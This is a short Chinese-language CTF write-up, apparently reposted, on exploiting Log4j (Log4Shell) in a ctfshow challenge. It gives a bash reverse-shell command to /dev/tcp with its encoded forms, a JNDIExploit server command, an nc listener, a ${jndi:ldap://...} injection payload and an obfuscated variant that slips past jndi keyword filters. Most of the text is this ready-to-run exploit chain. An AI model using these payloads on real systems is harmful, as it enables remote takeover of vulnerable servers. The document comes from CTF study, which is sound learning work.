ctfshow Log4j復現wp


聲明:

該文章來自本人日常學習筆記,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與本人無關

 

JNDIExploit

先將反彈shell的命令base64編碼,然后將里面的+號和=號進行一次url編碼

注:IP填vps公網ip,PORT要和nc監聽的端口對應

bash -i >& /dev/tcp/IP/PORT 0>&1
# => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE=
# => YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D

然后啟動JNDIExploit

java -jar JNDIExploit.jar -i ip -l 1389 -p 8180

用nc監聽端口

nc -lvnp port

payload:

${jndi:ldap://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}

將payload注入后shell會被反彈到nc監聽的端口上

拿到shell后cd到根目錄后ls看到flag文件

cat之即可拿到flag

 

補充:

如果jndi被屏蔽,繞過方法

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM